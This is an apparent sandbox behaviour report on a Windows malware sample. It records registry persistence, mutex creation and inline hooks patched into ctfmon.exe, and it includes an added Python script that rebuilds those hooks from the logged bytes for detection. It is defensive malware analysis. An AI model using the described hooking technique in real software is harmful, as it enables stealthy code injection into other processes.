Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: F40000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2820146962
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: F40000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2820192617
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2820197867
Thread created PID: 1520 TID: 2716 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2820658560
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: query and read Type: commit Baseaddress: 2940000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2820949108
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: query and read Type: commit Baseaddress: 2940000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2820957997
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 2feg2i1d Type: String Data: zohWpch3LqGxszKm success or wait 2827379944
System info queried Type: ProcessInformation success or wait 2827587134
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2827614966
Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 28C0000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 2828483674
Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 28C0000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 2828522822
Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 28C0000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 2828538930
Thread created PID: 1520 TID: 2808 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2830129219
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: ghhe0d4 object name not found 2830153114
System info queried Type: ProcessInformation success or wait 2830280785
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2830304612
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2830382152
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2830408524
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2830435511
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2830471271
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2830492060
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2830499767
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2830507947
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2830508925
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2830537443
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2830542467
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2830547630
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2830556695
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2830561719
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2830567145
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} object name exists 2830572129
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} object name exists 2830577353
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2830582258
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2830593093
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} object name exists 2830598813
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2832321887
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 618 HWNDs: 1006a, 3012e, 300a8, 30088, 1006e, 10084, 10068, 1006c, 30056, 70100, 3f0110, 7010c, 7004c, 300a4, 30094 success or wait 2832825705
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 618 HWNDs: 1006a, 3012e, 300a8, 30088, 1006e, 10084, 10068, 1006c, 30056, 70100, 3f0110, 7010c, 7004c, 300a4, 30094 success or wait 2832826301
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2835140831
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2835201999
+ Sections
+ General
Start time: 05:44:43
Start date: 08/12/2011
Path: C:\WINDOWS\system32\ctfmon.exe
Commandline: C:\WINDOWS\system32\ctfmon.exe
Imagebase: 0x400000
File size: 15360 bytes
MD5 hash: 5F1D5F88303D4A4DBC8E5F97BA967CC3
File Activities:
+ File opened
File Path | Access | Options | Content overwritten | Completion | Count | Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat | read attributes and synchronize and generic read | synchronous io non alert and non directory file | false | object name not found | 1 | 112A4FF
Section Activities:
+ Section loaded by Windows
File Path | Access | Type | Base | Size | Mapped to pid | Protection | Completion | Count
unknown | query and write and read | commit | B10000 | 12288 | own pid | read write | success or wait | 1
unknown | query and write and read | commit | B10000 | 12288 | own pid | read write | success or wait | 1
unknown | query and write and read | commit | B10000 | 12288 | own pid | read write | success or wait | 1
+ Section loaded by program
File Path | Access | Type | Base | Size | Mapped to pid | Protection | Completion | Count | Source Address
\KnownDlls\WS2_32.dll | write and read and execute | unknown | F40000 | 4096 | own pid | readonly | object name not found | 1 | 1124018
C:\WINDOWS\system32\ws2_32.dll | query and write and read and execute | image | 71AB0000 | 94208 | own pid | read write | success or wait | 1 | 1124018
\KnownDlls\WS2HELP.dll | write and read and execute | unknown | 71AB0000 | 94208 | own pid | read write | object name not found | 1 | 1124018
C:\WINDOWS\system32\ws2help.dll | query and write and read and execute | image | 71AA0000 | 32768 | own pid | read write | success or wait | 1 | 1124018
\KnownDlls\CRYPT32.dll | write and read and execute | unknown | 77A80000 | 610304 | own pid | read write | success or wait | 1 | 1124018
\KnownDlls\MSASN1.dll | write and read and execute | unknown | 77B20000 | 73728 | own pid | read write | success or wait | 1 | 1124018
\KnownDlls\WININET.dll | write and read and execute | unknown | 771B0000 | 696320 | own pid | read write | success or wait | 1 | 1124018
C:\WINDOWS\system32\wininet.dll | read | commit | 1250000 | 667648 | own pid | readonly | success or wait | 1 | 1124018
\KnownDlls\NETAPI32.dll | write and read and execute | unknown | 5B860000 | 348160 | own pid | read write | success or wait | 1 | 1124018
Registry Activities:
+ Key value replaced with new
Key Path | Name | Type | Old Data | New Data | Completion | Count | Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir | 15807505 | Binary | C5 D1 56 A5 | C4 D1 56 A5 | success or wait | 1 | 1115F0A
+ Key value queried
Key Path | Name | Completion | Count | Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters | Enabled | object name not found | 1 | 1115EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters | EnabledV8 | success or wait | 1 | 1115EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters | CleanCookies | success or wait | 1 | 1115FBA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters | CleanCookies | success or wait | 1 | 1115EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters | 1406 | success or wait | 5 | 1115EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters | 1609 | success or wait | 5 | 1115EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir | 15807505 | success or wait | 1 | 1115F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir | 15807505 | success or wait | 1 | 1115F7A
Mutant Activities:
+ Mutant created
Name | Completion | Count | Source Address
\BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} | object name exists | 1 | 112A811
\BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} | object name exists | 1 | 112A811
\BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} | success or wait | 1 | 1130DFC
Thread Activities:
+ Thread created
TID | PID | EIP | Injected | Filepath | Completion | Count | Source Address
1284 | 1788 | 7C8106F9 | false | C:\WINDOWS\system32\ctfmon.exe | success or wait | 1 | 1128106
440 | 1788 | 7C8106F9 | false | C:\WINDOWS\system32\ctfmon.exe | success or wait | 1 | 1128106
1980 | 1788 | 7C8106F9 | false | C:\WINDOWS\system32\ctfmon.exe | success or wait | 1 | 1128106
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1788 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771CE9C1 30 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 77212FC1 30 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771C4D8C 30 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771C82EA 30 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771F9100 30 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771D89F7 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771C79C2 30 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771F9C53 30 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771D9064 30 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771BB1D8 30 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 71AB676F 30 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 71AB4CB5 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 112F078
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1788 C:\WINDOWS\system32\ctfmon.exe A50000 10 B8 35 00 00 00 E9 A9 D1 EB 7B success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 5 E9 A4 AE 81 84 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5000A 10 68 6C 02 00 00 E9 1E 63 EC 7B success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 7C91632D 5 E9 09 1F 81 84 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50014 10 8B FF 55 8B EC E9 A3 2E 7C 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 77212EBC 5 E9 FD 4B F0 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5001E 10 8B FF 55 8B EC E9 7E 60 77 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771C60A1 5 E9 6F 1A F5 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50028 10 8B FF 55 8B EC E9 94 E9 77 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771CE9C1 5 E9 A6 91 F4 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50032 10 8B FF 55 8B EC E9 8A 2F 7C 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 77212FC1 5 E9 4B 4C F0 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5003C 10 8B FF 55 8B EC E9 4B 4D 77 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771C4D8C 5 E9 25 2F F5 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50046 10 8B FF 55 8B EC E9 9F 82 77 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771C82EA 5 E9 0A FA F4 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50050 10 8B FF 55 8B EC E9 AB 90 7A 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771F9100 5 E9 34 EC F1 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5005A 10 8B FF 55 8B EC E9 98 89 78 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771D89F7 5 E9 8B F3 F3 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50064 12 6A 2C 68 10 7B 1C 77 E9 59 79 77 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771C79C2 5 E9 F0 03 F5 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50070 10 8B FF 55 8B EC E9 DE 9B 7A 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771F9C53 5 E9 B4 E1 F1 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5007A 10 8B FF 55 8B EC E9 E5 8F 78 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771D9064 5 E9 BB ED F3 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50084 10 8B FF 55 8B EC E9 4F B1 76 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771BB1D8 5 E9 5F CC F5 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5008E 10 8B FF 55 8B EC E9 98 3D 06 71 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 71AB3E2B 5 E9 3E E9 66 8F success or wait 1 112F11A
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1788 C:\WINDOWS\system32\ctfmon.exe 1250000 124F8C8 page read and write success or wait 1 112A5EB
1788 C:\WINDOWS\system32\ctfmon.exe 1250000 124F8CC page read and write success or wait 1 112A5EB
1788 C:\WINDOWS\system32\ctfmon.exe A50000 124F4C0 page execute and read and write success or wait 1 1133FCB
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1788 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771CE9C1 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771CE9C1 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 77212FC1 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 77212FC1 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771C4D8C 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771C4D8C 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771C82EA 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771C82EA 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771F9100 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771F9100 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771D89F7 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771D89F7 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771C79C2 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771C79C2 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771F9C53 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771F9C53 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771D9064 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771D9064 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771BB1D8 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771BB1D8 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 71AB3E2B 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 71AB3E2B 1000 page execute read page execute and read and write success or wait 1 112F134
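The memory tables above record a textbook inline-hook installation inside ctfmon.exe (PID 1788): for each target the injected code sets the page to execute/read/write, reads 0x30 bytes of the original prologue, writes the stolen bytes plus a 5-byte `E9 rel32` jump back into a private RWX region at 0xA50000 (the trampoline), overwrites the first bytes of the target with a 5-byte `E9 rel32` jump to its own handler, and restores the original protection. The following script is an added example for this page, not part of the Joebox report and not code from the sample; it parses a handful of the "Memory written" rows (hex copied verbatim from the table above, only 4 of the 15 pairs) and resolves every `E9 rel32`, so an analyst can check that each hook's trampoline resumes exactly at hooked address + stolen length and that every handler lands in the injected region. It assumes 32-bit x86 (rel32 is signed and the sum wraps at 32 bits); the function names and the `MEMORY_WRITTEN` layout are the example's own.

```python
"""Reconstruct inline hooks from a sandbox report's "Memory written" rows.

Added example for this page (not part of the Joebox report, not the
sample's own code). Assumes the 32-bit x86 layout visible in the rows:
a 5-byte `E9 rel32` (jmp) patched over the hooked function, and a
trampoline that replays the stolen prologue bytes and ends in a second
`E9 rel32` back into the hooked function.
"""
import struct

# Constructed from the "Memory written" rows above (PID 1788, ctfmon.exe):
# (base address, bytes written). Four of the fifteen hook/trampoline pairs
# are reproduced; the parser handles any number of rows.
MEMORY_WRITTEN = [
    (0x00A50000, "B8 35 00 00 00 E9 A9 D1 EB 7B"),
    (0x7C90D1AE, "E9 A4 AE 81 84"),
    (0x00A5000A, "68 6C 02 00 00 E9 1E 63 EC 7B"),
    (0x7C91632D, "E9 09 1F 81 84"),
    (0x00A50064, "6A 2C 68 10 7B 1C 77 E9 59 79 77 76"),
    (0x771C79C2, "E9 F0 03 F5 89"),
    (0x00A5008E, "8B FF 55 8B EC E9 98 3D 06 71"),
    (0x71AB3E2B, "E9 3E E9 66 8F"),
]

MASK32 = 0xFFFFFFFF


def jmp_rel32_target(jmp_addr: int, code: bytes) -> int:
    """Resolve the destination of an `E9 rel32` located at jmp_addr.

    x86 computes the target relative to the end of the 5-byte instruction:
    dest = jmp_addr + 5 + rel32, with rel32 signed little-endian and the sum
    wrapping at 32 bits. That wrap is why a jump at 0x7C90D1AE with the
    immediate 0x8481AEA4 lands at 0x01128057, inside the injected region.
    """
    if len(code) != 5 or code[0] != 0xE9:
        raise ValueError("not an E9 rel32 jump: %s" % code.hex())
    (rel32,) = struct.unpack("<i", code[1:5])
    return (jmp_addr + 5 + rel32) & MASK32


def parse_hex(s: str) -> bytes:
    return bytes.fromhex(s.replace(" ", ""))


def reconstruct_hooks(rows):
    """Pair each 5-byte E9 patch (the hook) with the trampoline that resumes
    the original function; return one record per hooked address."""
    hooks = {}        # hooked address -> handler address
    trampolines = []  # (trampoline address, stolen bytes, resume address)
    for base, hexstr in rows:
        data = parse_hex(hexstr)
        if len(data) == 5 and data[0] == 0xE9:
            hooks[base] = jmp_rel32_target(base, data)
        elif len(data) > 5 and data[-5] == 0xE9:
            stolen = data[:-5]                       # replayed prologue bytes
            jmp_addr = base + len(stolen)            # where the trailing jmp sits
            trampolines.append((base, stolen, jmp_rel32_target(jmp_addr, data[-5:])))
    records = []
    for hooked, handler in sorted(hooks.items()):
        # The trampoline belonging to this hook resumes right after the
        # bytes the hook overwrote, i.e. at hooked + len(stolen).
        match = [t for t in trampolines if t[2] == hooked + len(t[1])]
        if len(match) != 1:
            # No (or ambiguous) trampoline: a hook that never returns to the
            # original, or a trampoline row missing from the report.
            records.append(dict(hooked=hooked, handler=handler, trampoline=None,
                                stolen=b"", resume=None, consistent=False))
            continue
        tramp, stolen, resume = match[0]
        records.append(dict(hooked=hooked, handler=handler, trampoline=tramp,
                            stolen=stolen, resume=resume, consistent=True))
    return records


def syscall_index(stolen: bytes):
    """If the stolen prologue starts with `mov eax, imm32` (B8 imm32), the
    hooked code is shaped like an ntdll system-call stub and imm32 is its
    service index; otherwise return None."""
    if len(stolen) >= 5 and stolen[0] == 0xB8:
        return struct.unpack("<I", stolen[1:5])[0]
    return None


if __name__ == "__main__":
    for r in reconstruct_hooks(MEMORY_WRITTEN):
        idx = syscall_index(r["stolen"])
        print("hook %08X -> handler %08X | trampoline %s resumes at %s (%d stolen bytes)%s"
              % (r["hooked"], r["handler"],
                 "%08X" % r["trampoline"] if r["trampoline"] is not None else "none",
                 "%08X" % r["resume"] if r["resume"] is not None else "none",
                 len(r["stolen"]),
                 " syscall index 0x%X" % idx if idx is not None else ""))
```

Run against the four pairs, every handler resolves to 0x0111xxxx or 0x0112xxxx, the same range as the Source Address column of the tables, and every trampoline resumes at hooked + stolen length. The stolen lengths are 5, 5, 7 and 5 bytes: the hook engine copies whole instructions, which is why the trampoline at 0xA50064 is 12 bytes (`push 2Ch; push 771C7B10h` is 7 bytes) while the others are 10. The prologue at 0x7C90D1AE (`B8 35 00 00 00 BA 00 03 FE 7F FF 12`) has the shape of a system-call stub, so that hook sits on a native service stub for index 0x35; which service that index maps to depends on the exact Windows build and is not stated in the report. Note also that the "Memory read" table lists 30 prologue reads but only 15 writes follow, so the hook set visible here may be incomplete. For detection, the same two artefacts the script relies on are what to scan a live process for: an `E9` at the first byte of exported functions in ntdll, wininet and ws2_32, and a private, non-image RWX allocation (here 0xA50000) that those jumps chain through.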
System Activities:
+ System information queried
System info class Completion Count Source Address
